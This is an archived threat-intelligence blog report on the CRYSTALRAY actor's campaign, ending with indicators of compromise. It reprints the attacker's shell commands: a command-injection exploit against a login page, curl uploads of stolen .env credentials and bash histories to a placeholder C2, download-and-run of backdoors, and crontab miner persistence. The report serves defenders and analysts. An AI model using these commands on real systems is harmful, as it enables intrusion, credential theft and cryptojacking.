{
	"id": "f804eec4-7fc9-43b1-97b0-1518c3a045ab",
	"created_at": "2026-04-06T00:19:26.404803Z",
	"updated_at": "2026-04-10T13:11:41.642872Z",
	"deleted_at": null,
	"sha1_hash": "b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef",
	"title": "CRYSTALRAY: Inside the Operations of a Rising Threat Actor Exploiting OSS Tools",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2698780,
	"plain_text": "CRYSTALRAY: Inside the Operations of a Rising Threat Actor\r\nExploiting OSS Tools\r\nBy Miguel Hernández\r\nPublished: 2024-07-11 · Archived: 2026-04-05 12:47:43 UTC\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nlearn more\r\nThe Sysdig Threat Research Team (TRT) continued observation of the SSH-Snake threat actor we first identified\r\nin February 2024. New discoveries showed that the threat actor behind the initial attack expanded its operations\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 1 of 17\n\ngreatly, justifying an identifier to further track and report on the actor and campaigns: CRYSTALRAY. This actor\r\npreviously leveraged the SSH-Snake open source software (OSS) penetration testing tool during a campaign\r\nexploiting Confluence vulnerabilities.\r\nThe team's latest observations show that CRYSTALRAY's operations have scaled 10x to over 1,500 victims and\r\nnow include mass scanning, exploiting multiple vulnerabilities, and placing backdoors using multiple OSS\r\nsecurity tools.\r\nCRYSTALRAY's motivations are to collect and sell credentials, deploy cryptominers, and maintain persistence in\r\nvictim environments. Some of the OSS tools the threat actor is leveraging include zmap, asn, httpx, nuclei,\r\nplatypus, and SSH-Snake.\r\nReleased on 4 January 2024, SSH-Snake is a self-modifying worm that leverages SSH credentials discovered on a\r\ncompromised system to start spreading itself throughout the network.\r\nThe worm automatically searches through known credential locations and shell history files to determine its next\r\nmove.\r\nBy avoiding the easily detectable patterns associated with scripted attacks, the tool provides greater stealth,\r\nflexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being\r\nmore efficient and successful.\r\nTechnical Analysis\r\nInitial Access\r\nTo gain access to its targets, CRYSTALRAY prefers to leverage existing vulnerability proof of concepts which\r\nthey modify for their payload. Using the previously gathered list of targets, they perform checks to verify that\r\nthose potential victims are vulnerable to the exploit they plan to use. The following commands are an example of\r\nhow CRYSTALRAY conducts this process:\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 2 of 17\n\n# Services vulnerable on port 2031\r\ncat port_2031_httpx.txt | nuclei -s critical -tags centos -bs 500 -c 2 -rl 100000 -o 2031_nuclei.txt -stats -si\r\n# Generate simple code to test the vulnerability\r\necho \"curl ip.me\" | base64\r\ncurl -X POST \"https://\u003cvictim-IP\u003e:2031/login/index.php?login=$(echo${IFS}Y3VybCBpcC5tZQo=${IFS}|${IFS}base64${IF\r\n# Get the exploit from GitHub and run it to the victim\r\ngit clone https://github.com/Chocapikk/CVE-2022-44877\r\ncd CVE-2022-44877\r\nchmod +x script.sh\r\n./script.sh scan \u003cvictim-IP\u003e:2031\r\n# Modified the script and upload to their automatization system.\r\nnano script.sh\r\nAt the very end, CRYSTALRAY edits the downloaded exploit in order to add the malicious payload, which is\r\noften a Platypus or Sliver client. This process is very similar to the other exploits they leverage, all taking\r\nadvantage of OSS tools and proof of concepts.  \r\nLateral Movement\r\nTo impact as many resources as possible, attacks commonly conduct lateral movement once they achieve remote\r\ncode execution (RCE). In this section, we will detail the tools and tactics CRYSTALRAY has successfully used to\r\nmove laterally through victims' environments.\r\nSSH-SNAKE\r\nTRT has already reported on CRYSTALRAY's use of the OSS penetration testing tool SSH-SNAKE (two months\r\nafter its release). SSH-SNAKE is a worm that uses ssh keys and credentials it discovers to propagate to new\r\nsystems and repeat its processes. All the while, SSH-Snake sends captured keys and bash histories back to its C2\r\nserver.\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 3 of 17\n\nCRYSTALRAY ran the following command to send the results from victims to their C2:\r\nif command -v curl \u003e/dev/null 2\u003e\u00261; then curl --max-time 100 https://raw.githubusercontent.com/MegaManSec/SSH-S\r\nThe image below is an example of SSH keys identified in the output of the SSH-Snake tool:\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 4 of 17\n\nCollection / Credential Access\r\nEnvironment Credentials\r\nAttackers don't just want to move between servers accessible via SSH. TRT discovered that CRYSTALRAY tried\r\nto move to other platforms, such as cloud providers. Attackers are looking for credentials in environment\r\nvariables, as TRT also reported in SCARLETEEL, to exponentially grow their impact. This credential discovery\r\nprocess is automatically performed on all devices to which the attacker gains access. The following commands are\r\nthe way that attackers are getting the credentials and uploading them:\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 5 of 17\n\ntmp=$(find / -type f -name \"*.env\" -o -name \"*.env.bak\" -o -name \"*config.env\" -o -name \"*.env.dist\" -o -name \"\r\nexe=$(bash cmd.sh \u003e \u003cenv_variables\u003e.txt)\r\npath=$(find / -type f -name env_variables.txt | grep -v 'Permission denied')\r\nid=$(curl -4 ip.me)\r\ncurl --upload-file $path \u003cC2_server\u003e/${id}_env_variables.txt\r\nrm -f cmd.sh env_variables.txt tmp.txt\r\nThe attackers use them in the future or sell them on black markets, such as telegram, where bulks of found\r\ncredentials are sold.\r\nHistory Files\r\nBash command histories provide valuable information, but their extraction is not common among attackers\r\nbecause it is hard to process automatically. CRYSTALRAY uses two repositories to speed up this discovery of\r\nsensitive information hosted on the system. These are:\r\nall-bash-history\r\nlinux-smart-enumeration\r\nIn this case, we know that it was extracted and stored on CRYSTALRAY's servers, likely to analyze or search for\r\nmore credentials or tokens that may arise from the data collected.\r\nif command -v curl \u003e/dev/null 2\u003e\u00261; then\r\n tmpfile=$(mktemp -p /tmp); find / -name .bash_history -exec cat {} + 2\u003e/dev/null \u003e \"$tmpfile\" ; if [ -s \"$tm\r\nfi\r\nIn the data previously during the original SSH-SNAKE investigation, we found 100 command histories. This\r\nnumber has expanded to more than 300 at the time of this report.\r\nCommand and Control / Persistence\r\nMaintaining access to compromised systems is often a priority for attackers. This is a common practice that TRT\r\nhas reported on twice before:\r\nRUBYCARP is a recent case where it used IRC servers for both internal and botnet communications. It\r\nwas focused on phishing campaigns and brute force attacks.\r\nRebirthltd was based on a modified Mirai binary. It attacked gaming servers and used telegram as a base of\r\noperations and to sell its services.\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 6 of 17\n\nSliver\r\nSpotted within their injection scripts, TRT discovered a script built to execute a strange payload. During analysis,\r\nresearchers found that this binary is a payload generated with Sliver. Sliver is an open source cross-platform\r\nadversary emulation/red team framework that can be used by organizations of all sizes to perform security testing.\r\nSliver's implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS, and are dynamically\r\ncompiled with per-binary asymmetric encryption keys.\r\necho \"hostctl\"\r\nif [ ! -f /tmp/hostctld ]; then\r\n download_file \"\u003cc2_server\u003e/hostctld\" \"/tmp/hostctld\"\r\n sleep 1\r\n chmod +x /tmp/hostctld\r\n nohup /tmp/hostctld \u003e/dev/null 2\u003e\u00261 \u0026\r\nfi\r\nif ! pgrep -f /tmp/hostctld \u003e /dev/null; then\r\n nohup /tmp/hostctld \u003e/dev/null 2\u003e\u00261 \u0026\r\nfi\r\nif [ \"$(id -u)\" -eq 0 ]; then\r\n if command -v systemctl \u0026\u003e/dev/null; then\r\n systemctl stop ext4; systemctl disable ext4; systemctl stop sshb; systemctl disable sshb\r\n echo \"User is root and systemctl is installed.\"\r\n curl -v --user \"\u003ccreds\u003e\" \u003cc2_server\u003e/hostctld --output /usr/bin/hostctld \u0026\u0026 chmod +x /usr/bin/hostctld \u0026\r\n echo -e \"[Unit]\\nDescription=Host Control Daemon\\n\\n[Service]\\nExecStart=/usr/bin/hostctld\\nRestart=alwa\r\nCRYSTALRAY runs the binary to maintain access to the system and connect to a specific port on the C2 server.\r\nBasically, it logs victims when they successfully exploit.\r\nThe actor also hosted two other payloads that have the same purpose – db.exe , similar to the previous one, and\r\nlinux_agent , created with the pentester tool emp3ror, a post-exploitation framework for Linux/Windows – but\r\nTRT has not discovered if they have been used. All the IoCs are reported here.\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 7 of 17\n\nPlatypus\r\nResearchers discovered the dashboard CRYSTALRAY used to manage their victims based on an open source tool\r\ncalled Platypus, a modern multiple reverse shell sessions/clients web-based manager written in go. The installation\r\nis quite simple. Below is an example running the binary of the latest version. In the following image, we can see\r\nthe output:\r\nPlatypus was previously reported in a cyptomining operation. TRT found more Platypus dashboards using Shodan\r\nand Censys Internet mapping services. By querying the default dashboard port, 7331, and ports 13338 and 13339,\r\nwhich are used to manage reverse shell connections, researchers were able to locate more instances of Platypus.\r\nDefault ports can be changed, so there are likely more out there.\r\nCensys Dashboard\r\nCRYSTALRAY ran Platypus on their server. Their dashboard has reset several times because it is an active\r\ncampaign and the number of victims varies from 100 to 400 based on uptime. This is a screenshot of the\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 8 of 17\n\ndashboard:\r\nPlatypus Dashboard\r\nCRYSTALRAY's victims are added to the C2 using the following commands (below). It is also interesting to see\r\nhow they look for a directory that they have write permission for.\r\nwritable_dir=$(find / -type d \\( -writable -a ! -path \"/tmp\" -a ! -path \"/tmp/*\" \\) -print -quit 2\u003e/dev/null)\r\ncd $writable_dir \u0026\u0026 curl -fsSL http://\u003cc2_server\u003e:13339/termite/\u003cc2_server\u003e:19951 -o wt \u0026\u0026 chmod +x wt \u0026\u0026 nohup\r\nwritable_dir_2=$(find /var -type d \\( -writable -a ! -path \"/tmp\" -a ! -path \"/tmp/*\" \\) -print -quit 2\u003e/dev/nul\r\ncd $writable_dir_2 \u0026\u0026 wget -q http://\u003cc2_server\u003e/termite/\u003cc2_server\u003e:44521 -O .sys \u0026\u0026 chmod +x .sys \u0026\u0026 nohup ./.\r\nwritable_dir_3=$(find /home -type d \\( -writable -a ! -path \"/tmp\" -a ! -path \"/tmp/*\" \\) -print -quit 2\u003e/dev/nu\r\ncd $writable_dir_3 \u0026\u0026 wget -q http://\u003cc2_server\u003e:13339/termite/\u003cc2_server\u003e:13337 -O netd \u0026\u0026 chmod +x netd \u0026\u0026 noh\r\nImpact of CRYSTALRAY\r\nSelling Credentials\r\nAs mentioned before, CRYSTALRAY is able to discover and extract credentials from vulnerable systems, which\r\nare then sold on black markets for thousands of dollars. The credentials being sold involve a multitude of services,\r\nincluding Cloud Service Providers and SaaS email providers.  \r\nThe raw data stolen from compromised hosts is stored in files on the attacker's C2 server. Below is an example of\r\na list of files. The filename starts with the IP address of the victim.\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 9 of 17\n\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 10 of 17\n\nAs TRT found through CRYSTALRAY's cryptomining activities, the attackers use an email address:\r\ncontact4restore@airmail[.]cc. Using contact4restore, researchers searched for other related accounts and found\r\ncontact4restore@proton[.]me.\r\nCryptomining\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 11 of 17\n\nAs is typical in cloud attacks, once the attackers have access, they try to use victim resources for financial gain.\r\nCRYSTALRAY has two associated cryptominers. One looks older and does not hide much and the other is more\r\nsophisticated, with the pool to which it was connecting hosted on the same C2 server.\r\nThe old script contains the following content to add the script to the crontab and download and run the miner.\r\ncrontab -r\r\n(crontab -l 2\u003e/dev/null; echo \"* * * * * curl -v --user 'qwerty:abc123' \u003cc2_server\u003e/lr/rotate --output /tmp/rota\r\ncurl -v --user '\u003ccreds\u003e' \u003cc2_server\u003e/lr/lr_linux --output /tmp/logrotate \u0026\u0026 chmod +x /tmp/logrotate\r\n /tmp/logrotate -o 51.222.12.201:10900 -u ZEPHYR3LgJXAXUmG23rRkN8LAALmt78re3a8PhWnnw5x8EZ5oEStbUuAWvyHnVUWL6E\r\nThe found wallet is connected to nanopool and some of the workers who match the scripts are connected.\r\nApproximately, they are mining around $200/month.\r\nIn a new script used in attacks over the course of April and May, CRYSTALRAY used a handcrafted config file\r\nwith the pools hosted in the same server used to store the results or host the command and control. In this case,\r\nTRT was unable to check balances or wallets associated with their operations.\r\ncat \u003e /usr/bin/config.json \u003c\u003cEOF\r\n{\r\n \"autosave\": true,\r\n \"cpu\": {\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 12 of 17\n\n\"enabled\": true,\r\n \"huge-pages\": true,\r\n \"yield\": true,\r\n \"max-threads-hint\": 100\r\n },\r\n \"opencl\": false,\r\n \"cuda\": false,\r\n \"randomx\": {\r\n \"init\": -1,\r\n \"init-avx2\": -1,\r\n \"mode\": \"auto\",\r\n \"1gb-pages\": true,\r\n \"rdmsr\": true,\r\n \"wrmsr\": true,\r\n \"cache_qos\": false,\r\n \"numa\": true,\r\n \"scratchpad_prefetch_mode\": 1\r\n },\r\n \"pools\": [\r\n {\r\n \"url\": \"\u003cc2_server\u003e:3333\"\r\n },\r\n {\r\n \"url\": \"\u003cc2_server\u003e:3333\"\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 13 of 17\n\n}\r\n ]\r\n}\r\nEOF\r\nif ! pgrep -x \"logrotate\" \u003e /dev/null\r\nthen\r\n # The process is not running, execute your commands here\r\n echo \"logrotate is not running. Executing commands...\"\r\n # Replace the following line with the commands you want to execute\r\n curl -v --user '\u003ccreds\u003e' \u003cc2_server\u003e/lr/lr_linux --output /tmp/logrotate \u0026\u0026 chmod +x /tmp/logrotate\r\n /tmp/logrotate -o \u003cc2_server\u003e:3333 --background --cpu-no-yield\r\ncurl -v --user '\u003ccreds\u003e' \u003cc2_server\u003e/lr_linux --output /usr/bin/log_rotate \u0026\u0026 chmod +x /usr/bin/log_rotate \u0026\u0026 ch\r\n echo -e \"[Unit]\\nDescription=Host Control Daemon\\n\\n[Service]\\nExecStart=/usr/bin/log_rotate\\nRestart=al\r\nKill Competitor Processes\r\nCRYSTALRAY also has a script to remove other cryptominers that victims may already have running. This is a\r\ncommon tactic used by attackers to make sure they have sole use of all of the victims' resources. Since many\r\nattackers are covering the same attack surfaces, they may likely come across previously compromised systems.\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 14 of 17\n\nRecommendations\r\nCRYSTALRAY's operations prove how easily an attacker can maintain and control access to victim networks\r\nusing only open source and penetration testing tools. Therefore, implementing detection and prevention measures\r\nto withstand attacker persistence is necessary.\r\nThe first step to avoid the vast majority of these automated attacks is to reduce the attack surface through\r\nvulnerability, identity, and secrets management. CRYSTALRAY is only one instance, but TRT is seeing automated\r\ncloud attacks more often.\r\nIf it is necessary to expose your applications to the Internet, they may be vulnerable at some point. Therefore,\r\norganizations must prioritize vulnerability remediation to reduce the risk of their exposure.\r\nFinally, it is necessary to have cameras/runtime detection that enables you to know — at any moment — if you\r\nhave been successfully attacked, to take remedial action, and to perform a more thorough forensic analysis and\r\nsolve the root cause.\r\nConclusion\r\nCRYSTALRAY is a new threat actor who prefers to use multiple OSS tools to perform widespread vulnerability\r\nscanning and exploitation. Once they gain access, they install one of several backdoors to keep control of the\r\ntarget. SSH-snake is then used to spread throughout a victim's network and collect credentials to sell.\r\nCryptominers are also deployed to gain further monetary value from the compromised assets.\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 15 of 17\n\nIoCs\r\nNetwork\r\n82[.]153.138.25 c2\r\n157[.]245.193.241 c2\r\n45[.]61.143.47 c2\r\naextg[.]us[.]to c2\r\nlinux[.]kyun[.]li c2\r\nww-1[.]us[.]to c2\r\nBinaries\r\nCMiz a22b0b20052e65ad713f5c3a7427b514ee4f2388f6fda0510e3f5c9ebc78859e\r\nHQdI c98d1d7686b5ff56e50264442ac27d4fb443425539de98458b7cfbf6131b606f\r\nigx1 da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9\r\npmqE 06bdd9a6753fba54f2772c1576f31db36f3b2b4e673be7e1ec9af3b180144eb9\r\nY3Eh da2bd678a49f428353cb570671aa04cddce239ecb98b825220af6d2acf85abe9\r\nagent_linux 6a7b06ed7b15339327983dcd7102e27caf72b218bdaeb5b47d116981df093c52\r\nbackup.sh db029555a58199fa6d02cbc0a7d3f810ab837f1e73eb77ec63d5367fa772298b\r\ndb.exe f037d0cc0a1dc30e92b292024ba531bd0385081716cb0acd9e140944de8d3089\r\nhostctld 1da7479af017ec0dacbada52029584a318aa19ff4b945f1bb9a51472d01284ec\r\nlogrotate b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605\r\nlr_bionic fdced57d370ba188380e681351c888a31b384020dff7e029bd868f5dce732a90\r\nlr_focal 673a399699ce8dad00fa2dffee2aab413948408e807977451ccd0ceaa8b00b04\r\nlr_linux 364a7f8e3701a340400d77795512c18f680ee67e178880e1bb1fcda36ddbc12c\r\nprocesslib2.so 8cbec5881e770ecea451b248e7393dfcfc52f8fbb91d20c6e34392054490d039\r\nprocesslib.so 908d7443875f3e043e84504568263ec9c39c207ff398285e849a7b5f20304c21\r\nrbmx 2b945609b5be1171ff9ea8d1ffdca7d7ba4907a68c6f91d409dd41a06bb70154\r\nrecon.sh a544d0ffd75918a4e46108db0ba112b7e95a88054ec628468876c7cf22c203a3\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 16 of 17\n\nremove_bg.sh 04fec439f2f08ec1ad8352859c46f865a6353a445410208a50aa638d93f49451\r\nremove.sh 5a35b7708846f96b3fb5876f7510357c602da67417e726c702ddf1ad2e71f813\r\nrfmx 7d003d3f5de5044c2c5d41a083837529641bd6bed13769d635c4e7f1b9147295\r\nrotate 7be2b15b56da32dc5bdb6228c2ed5c3bf3d8fc6236b337f625e3aff73a5c11d3\r\nrotate_cn_rt 08aaf6a45c17fa38958dd0ed1d9b25126315c6e0d93e7800472d0853ad696a87\r\nrotate_low 4f20eb19c627239aaf91c662da51ca7f298526df8e0eadccb6bbd7fc1bbcf0b3\r\nxmrig_arm64 0841a190e50c6022100c4c56c233108aa01e5da60ba5a57c9778135f42def544\r\nxmrig_freebsd b04db92036547d08d1a8b40e45fb25f65329fef01cf854caa1b57e0bf5faa605\r\nkp.sh 4dc790ef83397af9d9337d10d2e926d263654772a6584354865194a1b06ce305\r\npk f2aef4c5f95664e88c2dd21436aa2bee4d2e7f8d32231c238e1aa407120705e4\r\nAbout the author\r\nTest drive the right way to defend the cloudwith a security expert\r\nSource: https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nhttps://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sysdig.com/blog/crystalray-rising-threat-actor-exploiting-oss-tools/"
	],
	"report_names": [
		"crystalray-rising-threat-actor-exploiting-oss-tools"
	],
	"threat_actors": [
		{
			"id": "30ad968f-0645-433e-ae9a-40785fc72921",
			"created_at": "2024-04-19T02:00:03.628112Z",
			"updated_at": "2026-04-10T02:00:03.616986Z",
			"deleted_at": null,
			"main_name": "RUBYCARP",
			"aliases": [],
			"source_name": "MISPGALAXY:RUBYCARP",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c220fe19-ef23-4166-ac54-7a32c3ea75d7",
			"created_at": "2023-11-10T02:00:07.503009Z",
			"updated_at": "2026-04-10T02:00:03.437555Z",
			"deleted_at": null,
			"main_name": "SCARLETEEL",
			"aliases": [],
			"source_name": "MISPGALAXY:SCARLETEEL",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "97fe3aab-8c16-4c4a-afa0-d92e9cf44788",
			"created_at": "2024-07-17T02:00:04.182085Z",
			"updated_at": "2026-04-10T02:00:03.67316Z",
			"deleted_at": null,
			"main_name": "CRYSTALRAY",
			"aliases": [],
			"source_name": "MISPGALAXY:CRYSTALRAY",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434766,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef.pdf",
		"text": "https://archive.orkl.eu/b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef.txt",
		"img": "https://archive.orkl.eu/b1d46f20d7b5eb37bc038dc7e026b8b2c441b5ef.jpg"
	}
}